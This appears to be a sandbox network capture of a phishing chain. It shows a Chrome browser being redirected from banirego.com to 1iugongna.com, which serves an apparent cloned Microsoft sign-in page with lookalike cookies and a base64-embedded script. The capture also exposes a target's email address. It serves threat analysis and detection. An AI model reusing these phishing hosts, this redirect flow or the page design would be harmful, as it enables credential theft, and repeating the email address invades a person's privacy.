                                                                              2025-01-10 20:41:55 UTC1201INData Raw: 71 49 6d 33 73 5a 33 45 6d 70 42 36 74 36 57 4a 6d 49 61 37 69 70 79 63 76 38 6d 47 77 62 2b 50 6c 64 57 30 75 70 7a 4d 70 70 6d 71 6b 37 4b 39 70 4c 32 32 31 39 75 66 77 73 4f 2b 36 75 75 70 72 2b 37 76 72 62 50 4c 39 37 57 31 71 2b 76 74 37 37 50 4f 31 39 50 74 32 51 50 45 33 4e 32 2f 78 4e 4c 5a 77 67 44 44 32 75 66 6d 35 2b 30 4e 30 73 76 31 45 41 7a 50 34 76 50 78 7a 77 77 5a 33 41 34 4d 33 65 51 48 46 43 54 30 38 79 67 68 37 42 6f 48 2b 2b 38 65 37 4f 76 78 35 78 59 71 4c 4f 76 78 46 41 38 36 4d 44 6e 38 38 78 73 5a 42 54 49 30 50 66 6f 33 49 67 52 41 41 45 30 6f 4a 79 67 4a 43 79 4d 75 56 55 6f 55 57 69 63 4f 54 42 70 52 4e 6c 52 44 56 45 51 32 52 55 4d 6a 51 7a 52 46 57 55 51 39 4f 48 46 42 54 54 42 44 4c 53 68 70 55 45 39 43 63 55 35 4a 56 56 74
                                                                              Data Ascii: qIm3sZ3EmpB6t6WJmIa7ipycv8mGwb+PldW0upzMppmqk7K9pL2219ufwsO+6uupr+7vrbPL97W1q+vt77PO19Pt2QPE3N2/xNLZwgDD2ufm5+0N0sv1EAzP4vPxzwwZ3A4M3eQHFCT08ygh7BoH++8e7Ovx5xYqLOvxFA86MDn88xsZBTI0Pfo3IgRAAE0oJygJCyMuVUoUWicOTBpRNlRDVEQ2RUMjQzRFWUQ9OHFBTTBDLShpUE9CcU5JVVt
                                                                              2025-01-10 20:41:55 UTC1369INData Raw: 66 35 48 51 52 6b 6a 51 43 59 43 55 53 6f 6f 45 31 4a 41 4d 43 4e 56 46 54 6f 58 53 31 39 50 49 44 64 62 46 54 59 75 57 31 6f 6c 4d 31 74 6e 4f 56 6c 62 59 53 30 6a 63 47 49 79 59 7a 52 31 4f 48 55 35 52 6b 39 57 53 6b 31 51 57 32 74 2b 56 55 31 38 54 30 56 52 56 58 70 57 65 34 42 69 58 46 70 74 55 56 43 45 63 6f 35 56 6c 35 69 51 5a 34 71 51 61 46 61 65 6a 48 78 6a 65 33 71 63 59 70 65 72 71 58 32 46 69 57 6c 73 6e 59 6c 78 66 6f 36 43 6b 58 4f 43 6c 72 4b 4d 63 35 47 2b 67 4a 6d 30 6f 59 36 64 6e 70 6d 51 6b 70 4b 68 6c 61 58 45 76 70 71 6f 6e 63 65 63 6e 73 76 57 70 4d 53 56 74 35 79 32 71 65 43 77 33 39 79 78 6f 35 75 31 33 4c 4c 6e 75 61 65 65 36 36 6e 45 71 38 66 77 78 72 79 2f 79 73 47 30 30 65 50 32 78 76 6e 56 2f 63 75 7a 36 2f 62 56 41 74 4c 59
                                                                              Data Ascii: f5HQRkjQCYCUSooE1JAMCNVFToXS19PIDdbFTYuW1olM1tnOVlbYS0jcGIyYzR1OHU5Rk9WSk1QW2t+VU18T0VRVXpWe4BiXFptUVCEco5Vl5iQZ4qQaFaejHxje3qcYperqX2FiWlsnYlxfo6CkXOClrKMc5G+gJm0oY6dnpmQkpKhlaXEvpqoncecnsvWpMSVt5y2qeCw39yxo5u13LLnuaee66nEq8fwxry/ysG00eP2xvnV/cuz6/bVAtLY
                                                                              2025-01-10 20:41:55 UTC1369INData Raw: 34 4e 51 42 6f 4f 48 53 30 32 4c 52 52 5a 4a 44 51 72 50 6a 38 37 55 6c 4d 32 55 6a 74 62 55 46 67 34 50 56 59 35 58 6b 55 37 56 7a 34 6a 4d 69 74 64 50 7a 55 74 62 6e 6c 47 4c 57 74 39 55 6f 42 2f 50 47 4a 2f 67 46 64 7a 67 46 52 54 66 30 56 4b 59 34 75 43 55 47 68 6c 6a 55 61 42 66 30 39 72 68 6f 65 5a 54 6f 6d 66 6d 57 43 4e 6d 36 52 6b 67 59 43 54 67 48 68 33 72 48 79 49 61 33 36 41 73 6f 57 43 6f 72 43 6a 72 49 53 44 63 48 56 37 6b 37 79 67 66 5a 69 4f 6a 6f 4f 79 6f 63 69 49 74 61 4b 6b 6a 4b 4f 69 76 74 47 69 78 4a 2f 4a 78 36 66 57 6f 59 76 55 73 37 4b 30 76 63 2b 67 7a 64 76 56 31 35 66 55 76 37 76 57 31 2b 53 71 32 64 2f 70 73 4e 33 4e 71 38 33 47 73 62 58 59 35 2b 66 30 79 4d 33 61 75 64 4c 4c 2b 4f 4c 4f 41 73 54 34 30 65 48 6c 41 4d 76 57 32
                                                                              Data Ascii: 4NQBoOHS02LRRZJDQrPj87UlM2UjtbUFg4PVY5XkU7Vz4jMitdPzUtbnlGLWt9UoB/PGJ/gFdzgFRTf0VKY4uCUGhljUaBf09rhoeZTomfmWCNm6RkgYCTgHh3rHyIa36AsoWCorCjrISDcHV7k7ygfZiOjoOyociItaKkjKOivtGixJ/Jx6fWoYvUs7K0vc+gzdvV15fUv7vW1+Sq2d/psN3Nq83GsbXY5+f0yM3audLL+OLOAsT40eHlAMvW2
                                                                              2025-01-10 20:41:55 UTC685INData Raw: 45 4b 69 4e 49 4f 6b 34 58 4a 6c 4d 52 4b 46 31 42 59 53 38 39 4d 56 63 61 56 56 39 69 49 6c 74 6a 59 53 39 65 55 6b 45 30 54 6b 31 76 51 6d 6c 6f 56 45 68 36 63 48 5a 4b 57 58 64 34 54 33 4a 4f 56 56 4a 66 64 34 5a 58 69 58 78 2b 58 46 74 65 62 55 2b 44 67 4a 4a 56 63 47 70 6c 62 6d 57 4c 56 6d 71 66 6e 47 39 6a 70 49 57 6a 63 48 4a 39 6d 6d 71 70 68 6f 68 71 6f 4a 79 6f 62 72 47 6a 70 32 71 35 6c 6f 39 37 6c 62 75 38 69 72 2b 38 6f 58 2b 4e 72 38 57 49 74 71 47 45 67 72 75 45 7a 35 32 44 6b 4d 4b 54 30 71 4c 49 6c 61 48 51 73 5a 66 5a 73 72 4f 65 30 62 61 2f 74 39 4c 46 32 4b 50 44 75 73 71 65 37 4c 37 49 77 4b 50 73 75 37 4c 6b 31 74 57 30 30 66 4f 31 7a 50 72 61 79 62 76 58 2f 4d 2b 2f 7a 2b 38 43 77 2b 48 69 35 4e 6e 39 36 63 76 5a 36 2b 45 45 78 67
                                                                              Data Ascii: EKiNIOk4XJlMRKF1BYS89MVcaVV9iIltjYS9eUkE0Tk1vQmloVEh6cHZKWXd4T3JOVVJfd4ZXiXx+XFtebU+DgJJVcGplbmWLVmqfnG9jpIWjcHJ9mmqphohqoJyobrGjp2q5lo97lbu8ir+8oX+Nr8WItqGEgruEz52DkMKT0qLIlaHQsZfZsrOe0ba/t9LF2KPDusqe7L7IwKPsu7Lk1tW00fO1zPraybvX/M+/z+8Cw+Hi5Nn96cvZ6+EExg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.549833104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:56 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:56 UTC442INHTTP/1.1 400 Bad Request
                                                                              Date: Fri, 10 Jan 2025 20:41:56 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 14
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: 2cwQdRW2A+RJpdwgDxECoO/Ois0LyAgQJwA0OReqPUxc8uP6MX5IkScjc74cc1VxQZL0zbb07iqjfNcTFO+kZQ==$nUjE9djflwzy75NFvKZeWg==
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7da13e428cb3-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:56 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                              Data Ascii: {"err":100230}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.549828207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:56 UTC1240OUTPOST /?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t HTTP/1.1
                                                                              Host: banirego.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 902
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              Origin: https://banirego.com
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://banirego.com/?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
                                                                              2025-01-10 20:41:56 UTC902OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 43 4e 6a 77 55 54 72 68 48 6b 73 41 51 62 72 67 65 75 33 64 71 4f 53 61 50 63 4e 6a 43 79 6f 57 4a 4b 55 78 61 44 6d 45 43 2d 4a 79 6e 5f 75 38 45 78 37 2d 51 6b 48 68 31 50 39 39 30 72 78 49 67 2d 58 67 70 55 4d 37 61 7a 64 50 71 65 66 75 4b 51 6e 6b 63 44 64 7a 75 75 54 70 5f 4e 30 75 68 79 79 77 59 76 45 5f 69 35 70 6d 77 43 6b 74 31 79 46 70 58 43 36 33 33 4d 53 6d 72 41 31 6f 4a 6a 4a 4c 44 58 45 76 5f 4a 45 6a 67 38 62 79 70 49 65 6e 62 33 39 33 77 53 4b 4e 46 79 37 6b 39 4d 45 61 70 64 66 37 53 50 67 68 39 4b 64 46 6e 48 46 53 6f 66 35 39 35 71 6d 39 4f 64 4c 64 6a 65 4c 31 62 34 51 68 52 30 70 75 67 2d 6e 50 74 54 31 41 50 38 52 63 53 78 74 63 79 75 2d 6c 33 2d 58 4c 34 69 37
                                                                              Data Ascii: cf-turnstile-response=0.CNjwUTrhHksAQbrgeu3dqOSaPcNjCyoWJKUxaDmEC-Jyn_u8Ex7-QkHh1P990rxIg-XgpUM7azdPqefuKQnkcDdzuuTp_N0uhyywYvE_i5pmwCkt1yFpXC633MSmrA1oJjJLDXEv_JEjg8bypIenb393wSKNFy7k9MEapdf7SPgh9KdFnHFSof595qm9OdLdjeL1b4QhR0pug-nPtT1AP8RcSxtcyu-l3-XL4i7
                                                                              2025-01-10 20:41:56 UTC424INHTTP/1.1 302 Found
                                                                              location: https://1iugongna.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzFpdWdvbmduYS5jb20vIiwiZG9tYWluIjoiMWl1Z29uZ25hLmNvbSIsImtleSI6Im1pekZtN2x2aTRJeCIsInFyYyI6InJlY2liYXNlQHNlYW1hcml0aW1hLmNvbSIsImlhdCI6MTczNjU0MTcxNiwiZXhwIjoxNzM2NTQxODM2fQ.mg8KKqMk_b6jRb_kLR2AKWu0LYmXU6GtW6en6S22WT4
                                                                              Date: Fri, 10 Jan 2025 20:41:56 GMT
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              2025-01-10 20:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.549840207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:57 UTC1004OUTGET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzFpdWdvbmduYS5jb20vIiwiZG9tYWluIjoiMWl1Z29uZ25hLmNvbSIsImtleSI6Im1pekZtN2x2aTRJeCIsInFyYyI6InJlY2liYXNlQHNlYW1hcml0aW1hLmNvbSIsImlhdCI6MTczNjU0MTcxNiwiZXhwIjoxNzM2NTQxODM2fQ.mg8KKqMk_b6jRb_kLR2AKWu0LYmXU6GtW6en6S22WT4 HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Referer: https://banirego.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:57 UTC320INHTTP/1.1 302 Found
                                                                              Set-Cookie: qPdM=mizFm7lvi4Ix; path=/; samesite=none; secure; httponly
                                                                              Set-Cookie: qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; path=/; samesite=none; secure; httponly
                                                                              location: /?auth=2&qrc=recibase%40seamaritima.com
                                                                              Date: Fri, 10 Jan 2025 20:41:57 GMT
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              2025-01-10 20:41:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.549841207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:58 UTC823OUTGET /?auth=2&qrc=recibase%40seamaritima.com HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Referer: https://banirego.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
                                                                              2025-01-10 20:41:58 UTC2571INHTTP/1.1 200 OK
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Expires: -1
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              x-ms-request-id: 10022549-5f1e-44ba-914d-3146876c2600
                                                                              x-ms-ests-server: 2.1.19870.3 - EUS ProdSlices
                                                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              x-ms-srs: 1.P
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-7cPTNxBAEP93whekXdxdeg' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                              Set-Cookie: esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; domain=1iugongna.com; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: fpc=AqmpK8D-cVJBmJZccveAQWM; expires=Sun, 09-Feb-2025 20:41:58 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; domain=1iugongna.com; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                              Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                                                              Date: Fri, 10 Jan 2025 20:41:57 GMT
                                                                              Connection: close
                                                                              content-length: 21179
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:41:58 UTC13813INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32
                                                                              Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
                                                                              2025-01-10 20:41:58 UTC7366INData Raw: 29 7d 2c 63 2e 4f 6e 53 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 69 66 28 75 28 65 29 29 7b 72 65 74 75 72 6e 20 63 2e 4f 6e 45 72 72 6f 72 28 65 2c 74 29 7d 76 61 72 20 6e 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 2c 6f 3d 69 28 29 2c 73 3d 61 28 29 3b 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 4c 6f 61 64 65 64 22 2c 65 29 3b 76 61 72 20 64 3d 6e 65 77 20 63 0a 3b 64 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 64 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 52 65 6c
                                                                              Data Ascii: )},c.OnSuccess=function(e,t){if(!e){throw"The target element must be provided and cannot be null."}if(u(e)){return c.OnError(e,t)}var n=e.src||e.href||"",o=i(),s=a();r("[$Loader]: Loaded",e);var d=new c;d.failMessage="Reload Failed",d.successMessage="Rel


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.549857207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:59 UTC1201OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                                              2025-01-10 20:41:59 UTC1385INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:59 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 142536
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 12 Dec 2024 21:33:52 GMT
                                                                              ETag: 0x8DD1AF4AC8A4BB0
                                                                              x-ms-request-id: 197b9ffd-001e-0068-6b04-629a6b000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204159Z-155884f84d46sft9hC1BL1yxu40000000bpg00000000z273
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:41:59 UTC14999INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16
                                                                              Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO|T06 yx*8pT"1
